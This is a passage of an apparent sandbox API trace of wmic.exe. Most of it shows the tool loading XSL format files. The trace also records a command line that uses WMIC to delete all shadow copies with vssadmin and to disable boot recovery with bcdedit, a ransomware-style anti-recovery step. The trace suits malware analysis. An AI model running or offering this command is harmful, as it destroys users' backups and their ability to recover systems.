(This=0x678cf8) returned 0x0 [0169.446] IUnknown:Release (This=0x678c98) returned 0x0 [0169.446] IXMLDOMNodeList:get_item (in: This=0x678e80, index=10, listItem=0xcfd78 | out: listItem=0xcfd78*=0x674b20) returned 0x0 [0169.447] IXMLDOMNode:get_text (in: This=0x674b20, text=0xcfd80 | out: text=0xcfd80*="texttable.xsl") returned 0x0 [0169.447] IXMLDOMNode:get_attributes (in: This=0x674b20, attributeMap=0xcfd74 | out: attributeMap=0xcfd74*=0x678cf8) returned 0x0 [0169.447] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x678cf8, name="KEYWORD", namedItem=0xcfd70 | out: namedItem=0xcfd70*=0x678c98) returned 0x0 [0169.447] IXMLDOMNode:get_nodeValue (in: This=0x678c98, value=0xcfd1c | out: value=0xcfd1c*(varType=0x8, wReserved1=0x47, wReserved2=0x2cb0, wReserved3=0x47, varVal1="texttablewsys", varVal2=0x0)) returned 0x0 [0169.447] SysStringLen (param_1="texttablewsys") returned 0xd [0169.447] SysStringLen (param_1="TABLE") returned 0x5 [0169.447] SysStringLen (param_1="texttablewsys") returned 0xd [0169.447] SysStringLen (param_1="XML") returned 0x3 [0169.447] SysStringLen (param_1="texttablewsys") returned 0xd [0169.447] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0169.447] SysStringLen (param_1="XML") returned 0x3 [0169.447] SysStringLen (param_1="texttablewsys") returned 0xd [0169.448] IUnknown:Release (This=0x674b20) returned 0x0 [0169.448] IUnknown:Release (This=0x678cf8) returned 0x0 [0169.448] IUnknown:Release (This=0x678c98) returned 0x0 [0169.448] IXMLDOMNodeList:get_item (in: This=0x678e80, index=11, listItem=0xcfd78 | out: listItem=0xcfd78*=0x674b20) returned 0x0 [0169.448] IXMLDOMNode:get_text (in: This=0x674b20, text=0xcfd80 | out: text=0xcfd80*="texttable.xsl") returned 0x0 [0169.448] IXMLDOMNode:get_attributes (in: This=0x674b20, attributeMap=0xcfd74 | out: attributeMap=0xcfd74*=0x678cf8) returned 0x0 [0169.448] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x678cf8, name="KEYWORD", namedItem=0xcfd70 | out: namedItem=0xcfd70*=0x678c98) returned 0x0 [0169.449] IXMLDOMNode:get_nodeValue (in: This=0x678c98, value=0xcfd1c | out: value=0xcfd1c*(varType=0x8, wReserved1=0x47, wReserved2=0x2cb0, wReserved3=0x47, varVal1="wmiclitableformat.xsl", varVal2=0x0)) returned 0x0 [0169.449] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0169.449] SysStringLen (param_1="TABLE") returned 0x5 [0169.449] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0169.449] SysStringLen (param_1="XML") returned 0x3 [0169.449] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0169.449] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0169.449] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0169.449] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0169.450] IUnknown:Release (This=0x674b20) returned 0x0 [0169.450] IUnknown:Release (This=0x678cf8) returned 0x0 [0169.450] IUnknown:Release (This=0x678c98) returned 0x0 [0169.450] IXMLDOMNodeList:get_item (in: This=0x678e80, index=12, listItem=0xcfd78 | out: listItem=0xcfd78*=0x674b20) returned 0x0 [0169.450] IXMLDOMNode:get_text (in: This=0x674b20, text=0xcfd80 | out: text=0xcfd80*="texttable.xsl") returned 0x0 [0169.450] IXMLDOMNode:get_attributes (in: This=0x674b20, attributeMap=0xcfd74 | out: attributeMap=0xcfd74*=0x678cf8) returned 0x0 [0169.450] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x678cf8, name="KEYWORD", namedItem=0xcfd70 | out: namedItem=0xcfd70*=0x678c98) returned 0x0 [0169.450] IXMLDOMNode:get_nodeValue (in: This=0x678c98, value=0xcfd1c | out: value=0xcfd1c*(varType=0x8, wReserved1=0x47, wReserved2=0x2cb0, wReserved3=0x47, varVal1="wmiclitableformat", varVal2=0x0)) returned 0x0 [0169.451] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0169.451] SysStringLen (param_1="TABLE") returned 0x5 [0169.451] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0169.451] SysStringLen (param_1="XML") returned 0x3 [0169.451] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0169.451] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0169.451] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0169.451] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0169.451] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0169.451] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0169.451] IUnknown:Release (This=0x674b20) returned 0x0 [0169.451] IUnknown:Release (This=0x678cf8) returned 0x0 [0169.451] IUnknown:Release (This=0x678c98) returned 0x0 [0169.451] IXMLDOMNodeList:get_item (in: This=0x678e80, index=13, listItem=0xcfd78 | out: listItem=0xcfd78*=0x674b20) returned 0x0 [0169.452] IXMLDOMNode:get_text (in: This=0x674b20, text=0xcfd80 | out: text=0xcfd80*="texttable.xsl") returned 0x0 [0169.452] IXMLDOMNode:get_attributes (in: This=0x674b20, attributeMap=0xcfd74 | out: attributeMap=0xcfd74*=0x678cf8) returned 0x0 [0169.452] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x678cf8, name="KEYWORD", namedItem=0xcfd70 | out: namedItem=0xcfd70*=0x678c98) returned 0x0 [0169.452] IXMLDOMNode:get_nodeValue (in: This=0x678c98, value=0xcfd1c | out: value=0xcfd1c*(varType=0x8, wReserved1=0x47, wReserved2=0x2cb0, wReserved3=0x47, varVal1="wmiclitableformatnosys.xsl", varVal2=0x0)) returned 0x0 [0169.452] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0169.452] SysStringLen (param_1="TABLE") returned 0x5 [0169.452] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0169.452] SysStringLen (param_1="XML") returned 0x3 [0169.452] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0169.452] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0169.453] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0169.453] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0169.453] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0169.453] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0169.454] IUnknown:Release (This=0x674b20) returned 0x0 [0169.454] IUnknown:Release (This=0x678cf8) returned 0x0 [0169.454] IUnknown:Release (This=0x678c98) returned 0x0 [0169.454] IXMLDOMNodeList:get_item (in: This=0x678e80, index=14, listItem=0xcfd78 | out: listItem=0xcfd78*=0x674b20) returned 0x0 [0169.454] IXMLDOMNode:get_text (in: This=0x674b20, text=0xcfd80 | out: text=0xcfd80*="texttable.xsl") returned 0x0 [0169.454] IXMLDOMNode:get_attributes (in: This=0x674b20, attributeMap=0xcfd74 | out: attributeMap=0xcfd74*=0x678cf8) returned 0x0 [0169.455] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x678cf8, name="KEYWORD", namedItem=0xcfd70 | out: namedItem=0xcfd70*=0x678c98) returned 0x0 [0169.455] IXMLDOMNode:get_nodeValue (in: This=0x678c98, value=0xcfd1c | out: value=0xcfd1c*(varType=0x8, wReserved1=0x47, wReserved2=0x2cb0, wReserved3=0x47, varVal1="wmiclitableformatnosys", varVal2=0x0)) returned 0x0 [0169.455] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0169.455] SysStringLen (param_1="TABLE") returned 0x5 [0169.455] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0169.455] SysStringLen (param_1="XML") returned 0x3 [0169.455] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0169.455] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0169.455] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0169.455] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0169.455] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0169.455] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0169.455] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0169.455] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0169.456] IUnknown:Release (This=0x674b20) returned 0x0 [0169.456] IUnknown:Release (This=0x678cf8) returned 0x0 [0169.456] IUnknown:Release (This=0x678c98) returned 0x0 [0169.456] IXMLDOMNodeList:get_item (in: This=0x678e80, index=15, listItem=0xcfd78 | out: listItem=0xcfd78*=0x674b20) returned 0x0 [0169.456] IXMLDOMNode:get_text (in: This=0x674b20, text=0xcfd80 | out: text=0xcfd80*="htable.xsl") returned 0x0 [0169.456] IXMLDOMNode:get_attributes (in: This=0x674b20, attributeMap=0xcfd74 | out: attributeMap=0xcfd74*=0x678cf8) returned 0x0 [0169.456] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x678cf8, name="KEYWORD", namedItem=0xcfd70 | out: namedItem=0xcfd70*=0x678c98) returned 0x0 [0169.456] IXMLDOMNode:get_nodeValue (in: This=0x678c98, value=0xcfd1c | out: value=0xcfd1c*(varType=0x8, wReserved1=0x47, wReserved2=0x2cb0, wReserved3=0x47, varVal1="htable-sortby.xsl", varVal2=0x0)) returned 0x0 [0169.457] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0169.457] SysStringLen (param_1="TABLE") returned 0x5 [0169.457] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0169.457] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0169.457] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0169.457] SysStringLen (param_1="XML") returned 0x3 [0169.457] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0169.457] SysStringLen (param_1="texttablewsys") returned 0xd [0169.457] SysStringLen (param_1="XML") returned 0x3 [0169.457] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0169.457] IUnknown:Release (This=0x674b20) returned 0x0 [0169.457] IUnknown:Release (This=0x678cf8) returned 0x0 [0169.457] IUnknown:Release (This=0x678c98) returned 0x0 [0169.457] IXMLDOMNodeList:get_item (in: This=0x678e80, index=16, listItem=0xcfd78 | out: listItem=0xcfd78*=0x674b20) returned 0x0 [0169.458] IXMLDOMNode:get_text (in: This=0x674b20, text=0xcfd80 | out: text=0xcfd80*="htable.xsl") returned 0x0 [0169.458] IXMLDOMNode:get_attributes (in: This=0x674b20, attributeMap=0xcfd74 | out: attributeMap=0xcfd74*=0x678cf8) returned 0x0 [0169.458] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x678cf8, name="KEYWORD", namedItem=0xcfd70 | out: namedItem=0xcfd70*=0x678c98) returned 0x0 [0169.458] IXMLDOMNode:get_nodeValue (in: This=0x678c98, value=0xcfd1c | out: value=0xcfd1c*(varType=0x8, wReserved1=0x47, wReserved2=0x2cb0, wReserved3=0x47, varVal1="htable-sortby", varVal2=0x0)) returned 0x0 [0169.458] SysStringLen (param_1="htable-sortby") returned 0xd [0169.458] SysStringLen (param_1="TABLE") returned 0x5 [0169.458] SysStringLen (param_1="htable-sortby") returned 0xd [0169.552] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0169.552] SysStringLen (param_1="htable-sortby") returned 0xd [0169.552] SysStringLen (param_1="XML") returned 0x3 [0169.552] SysStringLen (param_1="htable-sortby") returned 0xd [0169.552] SysStringLen (param_1="texttablewsys") returned 0xd [0169.552] SysStringLen (param_1="htable-sortby") returned 0xd [0169.552] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0169.552] SysStringLen (param_1="XML") returned 0x3 [0169.552] SysStringLen (param_1="htable-sortby") returned 0xd [0169.552] IUnknown:Release (This=0x674b20) returned 0x0 [0169.552] IUnknown:Release (This=0x678cf8) returned 0x0 [0169.552] IUnknown:Release (This=0x678c98) returned 0x0 [0169.552] IXMLDOMNodeList:get_item (in: This=0x678e80, index=17, listItem=0xcfd78 | out: listItem=0xcfd78*=0x674b20) returned 0x0 [0169.553] IXMLDOMNode:get_text (in: This=0x674b20, text=0xcfd80 | out: text=0xcfd80*="mof.xsl") returned 0x0 [0169.553] IXMLDOMNode:get_attributes (in: This=0x674b20, attributeMap=0xcfd74 | out: attributeMap=0xcfd74*=0x678cf8) returned 0x0 [0169.553] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x678cf8, name="KEYWORD", namedItem=0xcfd70 | out: namedItem=0xcfd70*=0x678c98) returned 0x0 [0169.553] IXMLDOMNode:get_nodeValue (in: This=0x678c98, value=0xcfd1c | out: value=0xcfd1c*(varType=0x8, wReserved1=0x47, wReserved2=0x2cb0, wReserved3=0x47, varVal1="wmiclimofformat.xsl", varVal2=0x0)) returned 0x0 [0169.553] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0169.553] SysStringLen (param_1="TABLE") returned 0x5 [0169.553] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0169.553] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0169.553] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0169.553] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0169.554] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0169.554] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0169.554] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0169.554] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0169.554] IUnknown:Release (This=0x674b20) returned 0x0 [0169.554] IUnknown:Release (This=0x678cf8) returned 0x0 [0169.554] IUnknown:Release (This=0x678c98) returned 0x0 [0169.554] IXMLDOMNodeList:get_item (in: This=0x678e80, index=18, listItem=0xcfd78 | out: listItem=0xcfd78*=0x674b20) returned 0x0 [0169.554] IXMLDOMNode:get_text (in: This=0x674b20, text=0xcfd80 | out: text=0xcfd80*="mof.xsl") returned 0x0 [0169.554] IXMLDOMNode:get_attributes (in: This=0x674b20, attributeMap=0xcfd74 | out: attributeMap=0xcfd74*=0x678cf8) returned 0x0 [0169.554] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x678cf8, name="KEYWORD", namedItem=0xcfd70 | out: namedItem=0xcfd70*=0x678c98) returned 0x0 [0169.555] IXMLDOMNode:get_nodeValue (in: This=0x678c98, value=0xcfd1c | out: value=0xcfd1c*(varType=0x8, wReserved1=0x47, wReserved2=0x2cb0, wReserved3=0x47, varVal1="wmiclimofformat", varVal2=0x0)) returned 0x0 [0169.555] SysStringLen (param_1="wmiclimofformat") returned 0xf [0169.555] SysStringLen (param_1="TABLE") returned 0x5 [0169.555] SysStringLen (param_1="wmiclimofformat") returned 0xf [0169.555] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0169.555] SysStringLen (param_1="wmiclimofformat") returned 0xf [0169.555] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0169.555] SysStringLen (param_1="wmiclimofformat") returned 0xf [0169.555] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0169.555] SysStringLen (param_1="wmiclimofformat") returned 0xf [0169.555] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0169.555] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0169.555] SysStringLen (param_1="wmiclimofformat") returned 0xf [0169.556] IUnknown:Release (This=0x674b20) returned 0x0 [0169.556] IUnknown:Release (This=0x678cf8) returned 0x0 [0169.556] IUnknown:Release (This=0x678c98) returned 0x0 [0169.556] IXMLDOMNodeList:get_item (in: This=0x678e80, index=19, listItem=0xcfd78 | out: listItem=0xcfd78*=0x674b20) returned 0x0 [0169.556] IXMLDOMNode:get_text (in: This=0x674b20, text=0xcfd80 | out: text=0xcfd80*="textvaluelist.xsl") returned 0x0 [0169.556] IXMLDOMNode:get_attributes (in: This=0x674b20, attributeMap=0xcfd74 | out: attributeMap=0xcfd74*=0x678cf8) returned 0x0 [0169.556] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x678cf8, name="KEYWORD", namedItem=0xcfd70 | out: namedItem=0xcfd70*=0x678c98) returned 0x0 [0169.556] IXMLDOMNode:get_nodeValue (in: This=0x678c98, value=0xcfd1c | out: value=0xcfd1c*(varType=0x8, wReserved1=0x47, wReserved2=0x2cb0, wReserved3=0x47, varVal1="wmiclivalueformat.xsl", varVal2=0x0)) returned 0x0 [0169.557] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0169.557] SysStringLen (param_1="TABLE") returned 0x5 [0169.557] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0169.557] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0169.557] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0169.557] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0169.557] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0169.557] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0169.557] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0169.557] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0169.557] IUnknown:Release (This=0x674b20) returned 0x0 [0169.557] IUnknown:Release (This=0x678cf8) returned 0x0 [0169.557] IUnknown:Release (This=0x678c98) returned 0x0 [0169.557] IXMLDOMNodeList:get_item (in: This=0x678e80, index=20, listItem=0xcfd78 | out: listItem=0xcfd78*=0x674b20) returned 0x0 [0169.558] IXMLDOMNode:get_text (in: This=0x674b20, text=0xcfd80 | out: text=0xcfd80*="textvaluelist.xsl") returned 0x0 [0169.558] IXMLDOMNode:get_attributes (in: This=0x674b20, attributeMap=0xcfd74 | out: attributeMap=0xcfd74*=0x678cf8) returned 0x0 [0169.558] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x678cf8, name="KEYWORD", namedItem=0xcfd70 | out: namedItem=0xcfd70*=0x678c98) returned 0x0 [0169.558] IXMLDOMNode:get_nodeValue (in: This=0x678c98, value=0xcfd1c | out: value=0xcfd1c*(varType=0x8, wReserved1=0x47, wReserved2=0x2cb0, wReserved3=0x47, varVal1="wmiclivalueformat", varVal2=0x0)) returned 0x0 [0169.558] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0169.558] SysStringLen (param_1="TABLE") returned 0x5 [0169.558] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0169.558] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0169.558] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0169.558] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0169.558] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0169.558] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0169.558] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0169.558] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0169.559] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0169.559] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0169.559] IUnknown:Release (This=0x674b20) returned 0x0 [0169.559] IUnknown:Release (This=0x678cf8) returned 0x0 [0169.559] IUnknown:Release (This=0x678c98) returned 0x0 [0169.559] IUnknown:Release (This=0x678e80) returned 0x0 [0169.559] FreeThreadedDOMDocument:IUnknown:Release (This=0x678c58) returned 0x1 [0169.559] FreeThreadedDOMDocument:IUnknown:Release (This=0x674630) returned 0x0 [0169.559] GetCommandLineW () returned="wmic.exe process call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"" [0169.559] memcpy_s (in: _Destination=0x47ee58, _DestinationSize=0x18e, _Source=0x1f1674, _SourceSize=0x184 | out: _Destination=0x47ee58) returned 0x0 [0169.560] GetLocalTime (in: lpSystemTime=0xcfd28 | out: lpSystemTime=0xcfd28*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xb, wMilliseconds=0x194)) [0169.560] _vsnwprintf (in: _Buffer=0x7605b0, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0xcfd08 | out: _Buffer="08-30-2018T19:37:11") returned 19 [0169.560] lstrlenW (lpString=" process call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"") returned 186 [0169.560] lstrlenW (lpString=" process call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"") returned 186 [0169.560] lstrlenW (lpString=" process call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"") returned 186 [0169.560] lstrlenW (lpString=" process call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"") returned 186 [0169.560] lstrlenW (lpString=" process call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"") returned 186 [0169.560] lstrlenW (lpString=" process call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"") returned 186 [0169.560] lstrlenW (lpString="process") returned 7 [0169.560] _wcsicmp (_String1="process", _String2="\"NULL\"") returned 78 [0169.560] lstrlenW (lpString=" process call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"") returned 186 [0169.560] lstrlenW (lpString="call") returned 4 [0169.560] _wcsicmp (_String1="call", _String2="\"NULL\"") returned 65 [0169.560] memmove_s (in: _Destination=0x472f00, _DestinationSize=0x4, _Source=0x472cc8, _SourceSize=0x4 | out: _Destination=0x472f00) returned 0x0 [0169.561] lstrlenW (lpString=" process call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"") returned 186 [0169.561] lstrlenW (lpString="create") returned 6 [0169.561] _wcsicmp (_String1="create", _String2="\"NULL\"") returned 65 [0169.561] memmove_s (in: _Destination=0x47f080, _DestinationSize=0x8, _Source=0x472f00, _SourceSize=0x8 | out: _Destination=0x47f080) returned 0x0 [0169.561] lstrlenW (lpString=" process call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"") returned 186 [0169.561] lstrlenW (lpString="\"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"") returned 164 [0169.561] _wcsicmp (_String1="\"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"", _String2="\"NULL\"") returned -11 [0169.561] lstrlenW (lpString="\"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"") returned 164 [0169.561] lstrlenW (lpString="\"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"") returned 164 [0169.561] memmove_s (in: _Destination=0x47f020, _DestinationSize=0xc, _Source=0x47f080, _SourceSize=0xc | out: _Destination=0x47f020) returned 0x0 [0169.561] lstrlenW (lpString="QUIT") returned 4 [0169.561] lstrlenW (lpString="process") returned 7 [0169.561] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="process", cchCount1=7, lpString2="QUIT", cchCount2=4) returned 1 [0169.561] lstrlenW (lpString="EXIT") returned 4 [0169.562] lstrlenW (lpString="process") returned 7 [0169.562] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="process", cchCount1=7, lpString2="EXIT", cchCount2=4) returned 3 [0169.562] WbemLocator:IUnknown:AddRef (This=0x720828) returned 0x2 [0169.562] lstrlenW (lpString="/") returned 1 [0169.562] lstrlenW (lpString="process") returned 7 [0169.562] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="process", cchCount1=7, lpString2="/", cchCount2=1) returned 3 [0169.562] lstrlenW (lpString="-") returned 1 [0169.562] lstrlenW (lpString="process") returned 7 [0169.562] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="process", cchCount1=7, lpString2="-", cchCount2=1) returned 3 [0169.562] lstrlenW (lpString="CLASS") returned 5 [0169.562] lstrlenW (lpString="process") returned 7 [0169.562] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="process", cchCount1=7, lpString2="CLASS", cchCount2=5) returned 3 [0169.562] lstrlenW (lpString="PATH") returned 4 [0169.562] lstrlenW (lpString="process") returned 7 [0169.562] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="process", cchCount1=7, lpString2="PATH", cchCount2=4) returned 3 [0169.562] lstrlenW (lpString="CONTEXT") returned 7 [0169.562] lstrlenW (lpString="process") returned 7 [0169.562] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="process", cchCount1=7, lpString2="CONTEXT", cchCount2=7) returned 3 [0169.562] lstrlenW (lpString="process") returned 7 [0169.563] lstrlenW (lpString="process") returned 7 [0169.563] GetCurrentThreadId () returned 0xf7c [0169.563] ??0CHString@@QAE@XZ () returned 0xcfc7c [0169.563] WbemLocator:IWbemLocator:ConnectServer (in: This=0x720828, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x8bc1e0 | out: ppNamespace=0x8bc1e0*=0x72c74c) returned 0x0 [0172.174] CoSetProxyBlanket (pProxy=0x72c74c, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0172.174] ??1CHString@@QAE@XZ () returned 0x6f950504 [0172.174] GetCurrentThreadId () returned 0xf7c [0172.174] ??0CHString@@QAE@XZ () returned 0xcfc14 [0172.174] SysStringLen (param_1="root\\cli") returned 0x8 [0172.174] SysStringLen (param_1="\\") returned 0x1 [0172.174] SysStringLen (param_1="root\\cli\\") returned 0x9 [0172.174] SysStringLen (param_1="ms_409") returned 0x6 [0172.175] WbemLocator:IWbemLocator:ConnectServer (in: This=0x720828, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x8bc1e4 | out: ppNamespace=0x8bc1e4*=0x72c7cc) returned 0x0 [0172.554] ??1CHString@@QAE@XZ () returned 0x6f950504 [0172.554] GetCurrentThreadId () returned 0xf7c [0172.554] ??0CHString@@QAE@XZ () returned 0xcfc80 [0172.554] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0172.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x871f7c, cbMultiByte=-1, lpWideCharStr=0x472f00, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0172.554] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0172.554] SysStringLen (param_1="process") returned 0x7 [0172.555] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='process") returned 0x23 [0172.555] SysStringLen (param_1="'") returned 0x1 [0172.555] IWbemServices:GetObject (in: This=0x72c74c, strObjectPath="MSFT_CliAlias.FriendlyName='process'", lFlags=0, pCtx=0x0, ppObject=0xcfc7c*=0x0, ppCallResult=0x0 | out: ppObject=0xcfc7c*=0x74fff8, ppCallResult=0x0) returned 0x0 [0172.574] IWbemClassObject:Get (in: This=0x74fff8, wszName="Target", lFlags=0, pVal=0xcfc3c*(varType=0x0, wReserved1=0xc, wReserved2=0xe58c, wReserved3=0x8a, varVal1=0xffffffff, varVal2=0x87a03c), pType=0x0, plFlavor=0x0 | out: pVal=0xcfc3c*(varType=0x8, wReserved1=0xc, wReserved2=0xe58c, wReserved3=0x8a, varVal1="Select * from Win32_Process", varVal2=0x87a03c), pType=0x0, plFlavor=0x0) returned 0x0 [0172.575] lstrlenW (lpString="Select * from Win32_Process") returned 27 [0172.575] lstrlenW (lpString="Select * from Win32_Process") returned 27 [0172.575] IWbemClassObject:Get (in: This=0x74fff8, wszName="PWhere", lFlags=0, pVal=0xcfc3c*(varType=0x0, wReserved1=0xc, wReserved2=0xe58c, wReserved3=0x8a, varVal1=0x24b014, varVal2=0x87a03c), pType=0x0, plFlavor=0x0 | out: pVal=0xcfc3c*(varType=0x8, wReserved1=0xc, wReserved2=0xe58c, wReserved3=0x8a, varVal1="WHERE ProcessId='#'", varVal2=0x87a03c), pType=0x0, plFlavor=0x0) returned 0x0 [0172.575] lstrlenW (lpString="WHERE ProcessId='#'") returned 19 [0172.575] lstrlenW (lpString="WHERE ProcessId='#'") returned 19 [0172.575] IWbemClassObject:Get (in: 